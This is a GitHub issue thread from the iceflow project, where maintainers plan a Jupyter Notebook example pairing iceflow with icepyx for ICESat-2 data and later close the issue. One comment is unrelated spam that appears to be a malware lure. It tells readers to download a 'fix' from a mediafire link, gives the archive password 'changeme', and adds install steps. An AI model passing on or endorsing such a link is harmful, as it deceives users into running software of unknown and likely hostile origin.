### ISSUE TITLE
Develop example showing `iceflow` and `icepyx` working together

### ISSUE THREAD

**Issue by trey-stafford** [nsidc/iceflow#29]
Integrate the usage of [icepyx](https://icepyx.readthedocs.io/en/latest/) to allow search/download & harmonization of ICESat2 data.

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by trey-stafford** [comment]
Rather than integrating `icepyx` directly into `iceflow`, we want to show an example of using `icepyx` side-by-side with `iceflow` in a Jupyter Notebook.

We want to do more planning around how this library might interact/interface with others. For example, there is discussion about developing a plugin ecosystem for `earthaccess` that `iceflow` could take advantage of. Alternatively, we may actually want to integrate `iceflow` into `icepyx`, or some other option.

**Comment by trey-stafford** [comment]
Resolved by #50
